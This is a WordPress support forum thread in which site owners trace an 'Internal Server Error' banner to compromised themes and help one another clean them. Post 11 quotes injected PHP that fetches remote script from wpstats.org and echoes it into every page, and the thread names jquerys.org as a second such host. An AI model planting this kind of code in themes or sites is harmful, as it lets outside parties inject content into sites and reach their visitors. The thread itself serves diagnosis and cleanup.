WordPress.org

Ready to get started?Download WordPress

Forums

Internal Server Error (Hundreds of Sites with Same Message) (25 posts)

  1. selym
    Member
    Posted 2 years ago #

    Has anyone else seen this error message at the top of their sites? I only have it on one of mine, but when I do a search for it, I come across hundreds of other sites suffering the same fate.

    The only thing I could think of was a stats plugin, but I am not running one on the site in question. That address (wpstats.wpdb.org) returns the same error, so I'm not sure how my site is tied in with it, or if this was a hack, or what?

    Any ideas?

    Internal Server Error
    The server encountered an internal error or misconfiguration and was unable to complete your request.
    Please contact the server administrator, webmaster@wpstats.wpdb.org and inform them of the time the error occurred, and anything you might have done that may have caused the error.
    More information about this error may be available in the server error log.
    Additionally, a 500 Internal Server Error error was encountered while trying to use an ErrorDocument to handle the request.

  2. phunxzero
    Member
    Posted 2 years ago #

    wpstats.wpdb.org is down, its has the same error that is on our sites.

  3. fjoomla
    Member
    Posted 2 years ago #

    same..i dont have any wp stats plugins installed..
    how do we remove this message..

    i dont want other poorly run servers/services reflecting on my site..

  4. kalpitbansal
    Member
    Posted 2 years ago #

    Internal Server Error
    The server encountered an internal error or misconfiguration and was unable to complete your request.
    Please contact the server administrator, webmaster@wpstats.wpdb.org and inform them of the time the error occurred, and anything you might have done that may have caused the error.
    More information about this error may be available in the server error log.
    Additionally, a 500 Internal Server Error error was encountered while trying to use an ErrorDocument to handle the request.

    I am also getting the same error on my site. Is there any way to deal with this... i.e it doesn't display on the top of the site...

    It would help a lot if any one can help.

  5. kalpitbansal
    Member
    Posted 2 years ago #

    Here is a solution i got.

    Try:
    - switching to the Twenty Eleven theme by renaming your current theme's folder in wp-content/themes and adding "-old" to the end of the folder name using FTP or whatever file management application your host provides.

    - resetting the plugins folder by FTP or phpMyAdmin.

    - re-uploading all files & folders - except the wp-content folder - from a fresh download of WordPress.

    It will work.

    Cheers

  6. fjoomla
    Member
    Posted 2 years ago #

    how does one "reset" a plugin folder?

  7. how does one "reset" a plugin folder?

    Reset plugins.

    Despite the name, that site wpdb.org isn't part of WordPress.ORG. Going forward, you may wish instead to download plugins only from the plugin repo here.

    http://wordpress.org/extend/plugins/

  8. fjoomla
    Member
    Posted 2 years ago #

    hi jan..thanks..
    i didnt realize a WP install had the right to choose a repo...
    i thought http://wordpress.org/extend/plugins/ was the only choice
    is that done on the plugin level or from a user?

  9. If you just search then yes it goes to the official repo. That's a good thing. ;)

    But WordPress is about freedom and you can and should do what you like. You can always manually install plugins via the Upload Plugin link on your dashboard.

    http://your-wordpress-url/wp-admin/plugin-install.php?tab=upload

    If there is a plugin in the WordPress.ORG repo that is dialing home to wpstats.wpdb.org please reply back with that plugin name. That plugin may be violating a rule if it's hosted here.

    If you got that plugin from somewhere else, then there's not much to be done except perhaps make the decision to stop using that plugin.

  10. fjoomla
    Member
    Posted 2 years ago #

    i turned off all the plugins but still got the error..
    can it be something in the theme?

  11. anselmo
    Member
    Posted 2 years ago #

    To solve the problem you need to delete some php lines from your header.php theme's page.
    Scroll header.php until you find a piece of code like this and delete it:

    <?php if(function_exists('curl_init')) { $url = "http://www.wpstats.org/jquery-1.6.3.min.js";
    $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; } ?>

    That's all.
    Anx

  12. In all seriousness, and I apologize for shouting. I'm not trying to be rude but just want to make something clear and concise.

    *Takes a deep breath and faces the screen*

    ANY THEME THAT HAS A LINE IN IT REFERENCING WPSTATS.ORG IS HACKING YOUR WORDPRESS INSTALLATION AND YOU SHOULD DEACTIVATE AND DELETE THAT THEME FROM YOUR WORDPRESS INSTALLATION RIGHT NOW.

    Once again, I'm sorry for yelling.

    That site comes up as "Malicious Sources" on web filters and that is 100% NOT the way to load jquery. That domain name has nothing to do with WordPress and they're doing something really dodgy.

    If you insist on using a theme that has those Bad Things™ in it, that's your choice. But please consider dropping that theme and either get one from here or find a reputable source.

    If you do remove that theme (or not), check your site and see if you you've been compromised.

    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    http://sitecheck.sucuri.net/scanner/
    http://www.unmaskparasites.com/

  13. anselmo
    Member
    Posted 2 years ago #

    I have (better to say I had) that code. What I can do now????......

  14. Sorry for any heart palpataions I may have caused. ;)

    You may be fine; I can't even look at that dodgy site from where I am.

    You can check out your site via the last two links.

    http://sitecheck.sucuri.net/scanner/
    http://www.unmaskparasites.com/

    If you come up clean, odds are you are good to go. Chalk it up as a learning experience and go forth and use good sources from now on.

  15. anselmo
    Member
    Posted 2 years ago #

    Site is clean trying both check. Do you think once deleted that part of code everything it's ok?

  16. I'm sure it's probably fine. Both of those sites are thorough and if they can't see anything then you are probably good to go.

    That site wpstats.org has come up in other threads.

    This is a hot button for me because

    - They appearing to load jquery like that, goodness knows what they're really doing.

    - They've managed to get their site blacklisted on web filters (categorized as Malicious)

    - Using a misleading name like wpstats.org (permitted since they're not using WordPress but misleading as all else)

    It's disingenuous to the end users and they're doing something dodgy.

  17. anselmo
    Member
    Posted 2 years ago #

    Thanks.....

  18. fjoomla
    Member
    Posted 2 years ago #

    found my problem code..
    the lil booger was hiding in my theme>function.php file ...
    i just deleted everything between the //add theme jquery functions

    im not sure how important that jquery call is for this theme...i think its for the front page slider..i would assume all js files would included in the theme or wp install not an external call....so probably malicious or just bad coding..even though the mal ware scans were clean..
    the code also referenced "http://www.jquerys.org/jquery-1.6.3.min.js"
    that too was bogus i think....

    but either way once i removed the call problem was solved

    i had to search file by file in the editor till i found the code referencing the external js calls ..

    thanks for everyones help.

  19. That http://www.jquerys.org (note the s?) also comes up as malicious in the web filter. It's a dodgy site too.

    IMHO: Seriously, I recommend that you lose that theme like a bad infection. It just can't be worth the risk.

  20. anselmo
    Member
    Posted 2 years ago #

    fjoomla I've found a malicious code also in footer.php and in header.php so scan these files.

  21. Olek4
    Member
    Posted 1 year ago #

    This problem should be resolved by now. If not, try contacting your host.

  22. haw3455
    Member
    Posted 1 year ago #

    I'm a complete novice and just exported from wordpress.com to wordpress.org. I have static pages and unfortunately, none of them, except the home page, show and I get this error message:
    Internal Server Error

    The server encountered an internal error or misconfiguration and was unable to complete your request.

    Please contact the server administrator, webmaster@orlandosinglesparties.facebook-singles.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.

    More information about this error may be available in the server error log.

    Additionally, a 500 Internal Server Error error was encountered while trying to use an ErrorDocument to handle the request.

    I only know how to do things via the wp-admin, can anybody help me with this? my site name is http://www.orlandosinglesparties.com
    Thank you so much

  23. esmi
    Forum Moderator
    Posted 1 year ago #

    As per the Forum Welcome, please post your own topic. Your problem - despite any similarity in symptoms - is likely to be completely different.

  24. teehamaral
    Member
    Posted 1 year ago #

    O erro se encontra no arquivo .htaccess, no meu caso havia o caminho do site (Ex.: /site/) é só deixar apenas /

    Valeus !

  25. saxenamayur19
    Member
    Posted 1 year ago #

    Guys,

    In one the website I was also facing same issue but I didn't do so much just went to permalink option under settings and then set it to default and save it after that it was running fine but make sure that you have updated new domain name or url in post_content column and in guid in wp_post , same in site url and home url in wp_options.

Topic Closed

This topic has been closed to new replies.

About this Topic